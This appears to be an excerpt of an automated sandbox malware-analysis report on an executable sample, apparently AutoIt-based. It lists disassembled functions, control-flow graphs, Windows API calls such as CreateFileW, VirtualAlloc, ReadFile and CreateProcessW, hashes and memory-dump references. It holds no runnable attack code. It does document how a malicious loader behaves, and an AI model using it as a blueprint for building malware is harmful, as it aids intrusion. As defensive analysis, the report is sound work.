                                                                                                                        control_flow_graph 1378 545aa9-545ace 1379 545ad7-545ad9 1378->1379 1380 545ad0-545ad2 1378->1380 1382 545afa-545b1f 1379->1382 1383 545adb-545af5 call 53f2c6 call 53f2d9 call 5427ec 1379->1383 1381 545ca5-545cb4 call 530a8c 1380->1381 1385 545b26-545b2c 1382->1385 1386 545b21-545b24 1382->1386 1383->1381 1391 545b2e-545b46 call 53f2c6 call 53f2d9 call 5427ec 1385->1391 1392 545b4b 1385->1392 1386->1385 1390 545b4e-545b53 1386->1390 1395 545b64-545b6d call 54564e 1390->1395 1396 545b55-545b61 call 549424 1390->1396 1426 545c9c-545c9f 1391->1426 1392->1390 1407 545b6f-545b71 1395->1407 1408 545ba8-545bba 1395->1408 1396->1395 1412 545b95-545b9e call 54542e 1407->1412 1413 545b73-545b78 1407->1413 1410 545c02-545c23 WriteFile 1408->1410 1411 545bbc-545bc2 1408->1411 1417 545c25-545c2b GetLastError 1410->1417 1418 545c2e 1410->1418 1420 545bc4-545bc7 1411->1420 1421 545bf2-545c00 call 5456c4 1411->1421 1427 545ba3-545ba6 1412->1427 1414 545c6c-545c7e 1413->1414 1415 545b7e-545b8b call 5455e1 1413->1415 1424 545c80-545c83 1414->1424 1425 545c89-545c99 call 53f2d9 call 53f2c6 1414->1425 1435 545b8e-545b90 1415->1435 1417->1418 1428 545c31-545c3c 1418->1428 1429 545be2-545bf0 call 545891 1420->1429 1430 545bc9-545bcc 1420->1430 1421->1427 1424->1425 1433 545c85-545c87 1424->1433 1425->1426 1439 545ca4 1426->1439 1427->1435 1436 545ca1 1428->1436 1437 545c3e-545c43 1428->1437 1429->1427 1430->1414 1438 545bd2-545be0 call 5457a3 1430->1438 1433->1439 1435->1428 1436->1439 1443 545c45-545c4a 1437->1443 1444 545c69 1437->1444 1438->1427 1439->1381 1447 545c60-545c67 call 53f2a3 1443->1447 1448 545c4c-545c5e call 53f2d9 call 53f2c6 1443->1448 1444->1414 1447->1426 1448->1426
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: JOQ
                                                                                                                        • API String ID: 0-3921798060
                                                                                                                        • Opcode ID: 406b47cefafd532f179173fe4036eb942f9cb2223270f1b6d72f8732076f18dd
                                                                                                                        • Instruction ID: 6a2e05dfffb8997bfcb0bbf0ecc67ba69fdb86b8c7cd3d9f2bc7bf9880926ced
                                                                                                                        • Opcode Fuzzy Hash: 406b47cefafd532f179173fe4036eb942f9cb2223270f1b6d72f8732076f18dd
                                                                                                                        • Instruction Fuzzy Hash: CE51BE75D0060A9BCB259FA4CC89FEEBFB8FF45318F14045AF405A7292E6319D01DB61
                                                                                                                        Function 01720C00 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156fileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1457 1720c00-1720d44 call 171e7e0 call 1720af0 CreateFileW 1464 1720d46 1457->1464 1465 1720d4b-1720d5b 1457->1465 1466 1720e18-1720e1d 1464->1466 1468 1720d62-1720d7c VirtualAlloc 1465->1468 1469 1720d5d 1465->1469 1470 1720d83-1720d9a ReadFile 1468->1470 1471 1720d7e 1468->1471 1469->1466 1472 1720d9e-1720db3 call 171f850 1470->1472 1473 1720d9c 1470->1473 1471->1466 1475 1720db8-1720df2 call 1720b30 call 171faf0 1472->1475 1473->1466 1480 1720df4-1720e09 call 1720b80 1475->1480 1481 1720e0e-1720e16 1475->1481 1480->1481 1481->1466
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 01720AF0: Sleep.KERNELBASE(000001F4), ref: 01720B01
                                                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01720D3A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1370595821.000000000171E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171E000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_171e000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFileSleep
                                                                                                                        • String ID: ASLZDWNV112XA880LIC3
                                                                                                                        • API String ID: 2694422964-2396587938
                                                                                                                        • Opcode ID: dc1ff63ad4645557462787b299d53a89de36b7ef98bd21dbf2c6f37b9c6b7e6a
                                                                                                                        • Instruction ID: 78f4ba92aa6bc2a2851150453de98e0d032fda6e0cff1b11bcfb4e7ba03eece8
                                                                                                                        • Opcode Fuzzy Hash: dc1ff63ad4645557462787b299d53a89de36b7ef98bd21dbf2c6f37b9c6b7e6a
                                                                                                                        • Instruction Fuzzy Hash: B5619431D04258DBEF11DBB4C854BEEFB75AF18300F004199E649BB2C1D6B91B85CBA5
                                                                                                                        Function 00513B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00513B0F,SwapMouseButtons,00000004,?), ref: 00513B40
                                                                                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00513B0F,SwapMouseButtons,00000004,?), ref: 00513B61
                                                                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00513B0F,SwapMouseButtons,00000004,?), ref: 00513B83
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                        • String ID: Control Panel\Mouse
                                                                                                                        • API String ID: 3677997916-824357125
                                                                                                                        • Opcode ID: 319631d09ed959d626de6772052e70475460ae4af12e77f925a05db88f3ffe56
                                                                                                                        • Instruction ID: 09d53879e9682ef28836425b54e2f20288d6eab53c977c5ae174cfe8191ab0fe
                                                                                                                        • Opcode Fuzzy Hash: 319631d09ed959d626de6772052e70475460ae4af12e77f925a05db88f3ffe56
                                                                                                                        • Instruction Fuzzy Hash: 35112AB5514208FFEB208FA5DC58AEFBBB8FF05744B104859A805D7110E2319E84A760
                                                                                                                        Function 00512DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 00552C8C
                                                                                                                          • Part of subcall function 00513AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00513A97,?,?,00512E7F,?,?,?,00000000), ref: 00513AC2
                                                                                                                          • Part of subcall function 00512DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00512DC4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Name$Path$FileFullLongOpen
                                                                                                                        • String ID: X$`e]
                                                                                                                        • API String ID: 779396738-2761306869
                                                                                                                        • Opcode ID: 233d51a63626955e37975bd671959e772abcd52637bf02909dccb5e526c68677
                                                                                                                        • Instruction ID: 6c7f1b1fc690e06ec670124cc7bb6c773e2ca169bf0c90e93474dc7d2e786c83
                                                                                                                        • Opcode Fuzzy Hash: 233d51a63626955e37975bd671959e772abcd52637bf02909dccb5e526c68677
                                                                                                                        • Instruction Fuzzy Hash: 64218171A002589BDB41DF98D849BEE7FF8BF89305F00405AE405A7241DBB45A898F61
                                                                                                                        Function 0052FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00530668
                                                                                                                          • Part of subcall function 005332A4: RaiseException.KERNEL32(?,?,?,0053068A,?,005E1444,?,?,?,?,?,?,0053068A,00511129,005D8738,00511129), ref: 00533304
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00530685
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                        • String ID: Unknown exception
                                                                                                                        • API String ID: 3476068407-410509341
                                                                                                                        • Opcode ID: 5f046944508990d77bcca195b3eb21cdaeacba7b5e0e1ffc2464641e2347036e
                                                                                                                        • Instruction ID: 330f89fbd2b33b6d71b1ab31fef8c90d072caeb2ce816210f737f1f86866d3d9
                                                                                                                        • Opcode Fuzzy Hash: 5f046944508990d77bcca195b3eb21cdaeacba7b5e0e1ffc2464641e2347036e
                                                                                                                        • Instruction Fuzzy Hash: DEF0C23490030E77CF00B6A8E85AC9E7F7CBE81310F604532B824D65D5EF71EA65CA80
                                                                                                                        Function 0171F7E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 0171F825
                                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 0171F844
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1370595821.000000000171E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171E000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_171e000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CreateExit
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 126409537-2746444292
                                                                                                                        • Opcode ID: 0821f884aa5cc6b4c195274ad0b22897ff79d929f6fdf946f6e29fa30509634f
                                                                                                                        • Instruction ID: 7f4db5af244b045c46d3ac367a5aef96f0868f040d9d4857ec1687d80ee7b21c
                                                                                                                        • Opcode Fuzzy Hash: 0821f884aa5cc6b4c195274ad0b22897ff79d929f6fdf946f6e29fa30509634f
                                                                                                                        • Instruction Fuzzy Hash: 09F0127594025CABDB60EFE4CC49FEEB77CBF08701F008508FB0A9A184DB7496488B61
                                                                                                                        Function 00583017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0058302F
                                                                                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00583044
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Temp$FileNamePath
                                                                                                                        • String ID: aut
                                                                                                                        • API String ID: 3285503233-3010740371
                                                                                                                        • Opcode ID: 038fd748eb899c10e404d46cb98af4203e423808cc145bea8e3fd1be1bbd4c8d
                                                                                                                        • Instruction ID: 6349e2c1f7829ac0352a18ac60e74142055a2daec3e7fff74015cc1ae81553e9
                                                                                                                        • Opcode Fuzzy Hash: 038fd748eb899c10e404d46cb98af4203e423808cc145bea8e3fd1be1bbd4c8d
                                                                                                                        • Instruction Fuzzy Hash: 27D05B7550031467DB3097949D0DFC73F6CDB05750F0001927795D2091DAB09544CAD0
                                                                                                                        Function 00597F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 005982F5
                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 005982FC
                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 005984DD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 146820519-0
                                                                                                                        • Opcode ID: a195adae46b7b2e7bd96e45ea7c4574d97a2f8466c7c307c77b710575aa33940
                                                                                                                        • Instruction ID: 0d96c532a0a2ee81883e9a0173f347c5bb0cf8102b6e3803287d85da41dbf445
                                                                                                                        • Opcode Fuzzy Hash: a195adae46b7b2e7bd96e45ea7c4574d97a2f8466c7c307c77b710575aa33940
                                                                                                                        • Instruction Fuzzy Hash: 80126B71A083019FDB14DF28C484B6ABBE5BF89318F04895DE8998B352DB31ED45CF92
                                                                                                                        Function 005110F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00511BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00511BF4
                                                                                                                          • Part of subcall function 00511BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00511BFC
                                                                                                                          • Part of subcall function 00511BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00511C07
                                                                                                                          • Part of subcall function 00511BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00511C12
                                                                                                                          • Part of subcall function 00511BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00511C1A
                                                                                                                          • Part of subcall function 00511BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00511C22
                                                                                                                          • Part of subcall function 00511B4A: RegisterWindowMessageW.USER32(00000004,?,005112C4), ref: 00511BA2
                                                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0051136A
                                                                                                                        • OleInitialize.OLE32 ref: 00511388
                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000), ref: 005524AB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1986988660-0
                                                                                                                        • Opcode ID: 8a32f3a6012534e4f96d3bae3026659cd6a5cd936f2d737d661fd558a8251700
                                                                                                                        • Instruction ID: a2c1be7d9bad3e72d67d319451dd2cef8a1051d32bf9687fd9b9a2537118ac49
                                                                                                                        • Opcode Fuzzy Hash: 8a32f3a6012534e4f96d3bae3026659cd6a5cd936f2d737d661fd558a8251700
                                                                                                                        • Instruction Fuzzy Hash: 8F71C1B5905B818ED78CDF79A9C56993EE0FBA9340744416BD08ACF3A1EB304488EF4D
                                                                                                                        Function 0057C161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00513923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00513A04
                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0057C259
                                                                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 0057C261
                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0057C270
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconNotifyShell_Timer$Kill
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3500052701-0
                                                                                                                        • Opcode ID: 323a4ba2c2e87e9a23c0464eedba2a5f51c5e4639491052d88761e9aaa3b46a0
                                                                                                                        • Instruction ID: 8268c38520dea522e2ad6d0c6ea99744c00fa1bb3e7c6e7c4814fcfdb04259e6
                                                                                                                        • Opcode Fuzzy Hash: 323a4ba2c2e87e9a23c0464eedba2a5f51c5e4639491052d88761e9aaa3b46a0
                                                                                                                        • Instruction Fuzzy Hash: 9C31C574904744AFEB22CF64A895BEBBFECAB17304F00449DD2DE97242C7745A88DB51
                                                                                                                        Function 005486AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNELBASE(00000000,00000000,?,?,005485CC,?,005D8CC8,0000000C), ref: 00548704
                                                                                                                        • GetLastError.KERNEL32(?,005485CC,?,005D8CC8,0000000C), ref: 0054870E
                                                                                                                        • __dosmaperr.LIBCMT ref: 00548739
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2583163307-0
                                                                                                                        • Opcode ID: 13746a9286d7fc3804120b1d10a8ee9d0988eada42a7bdc636fafadc96d8caf8
                                                                                                                        • Instruction ID: ca96c30c1691fcba0cd7422c8e6215f49d8d2d32e340fa7d64285d3245ada209
                                                                                                                        • Opcode Fuzzy Hash: 13746a9286d7fc3804120b1d10a8ee9d0988eada42a7bdc636fafadc96d8caf8
                                                                                                                        • Instruction Fuzzy Hash: E0018E33A0426027D6A56B346889BFE2F59BBE277CF3A0519F8148B1D3EEB1CC819150
                                                                                                                        Function 0051DB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • TranslateMessage.USER32(?), ref: 0051DB7B
                                                                                                                        • DispatchMessageW.USER32(?), ref: 0051DB89
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0051DB9F
                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 0051DBB1
                                                                                                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 00561CC9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3288985973-0
                                                                                                                        • Opcode ID: 63e18fd78ce78f31ea2fdcd4028c3206ac68d47b68e7d8c617a6442931273816
                                                                                                                        • Instruction ID: b04c57b5133ee7231b73540fc7dc41ed18e125d81c195027c2f3adf0a976cd47
                                                                                                                        • Opcode Fuzzy Hash: 63e18fd78ce78f31ea2fdcd4028c3206ac68d47b68e7d8c617a6442931273816
                                                                                                                        • Instruction Fuzzy Hash: DBF05E306483809BFB34CB608C89FEA7BBCFB95310F104918E64A830C0DB30A488DB29
                                                                                                                        Function 00582FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00582CD4,?,?,?,00000004,00000001), ref: 00582FF2
                                                                                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00582CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00583006
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00582CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0058300D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseCreateHandleTime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3397143404-0
                                                                                                                        • Opcode ID: f9ecb8f9f3c0960f86251ba74840c755d5c76f292d13602c2309fef65ac29e6c
                                                                                                                        • Instruction ID: ace23b7b4834e6e9de36bc86a17b135bfa3756152a7ac01cfc0a3ac53ca464b7
                                                                                                                        • Opcode Fuzzy Hash: f9ecb8f9f3c0960f86251ba74840c755d5c76f292d13602c2309fef65ac29e6c
                                                                                                                        • Instruction Fuzzy Hash: 14E0863238021077D7312755BC0DF8B3E1CD787F71F104211FB19750D08AA0550593A8
                                                                                                                        Function 00521310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 005217F6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
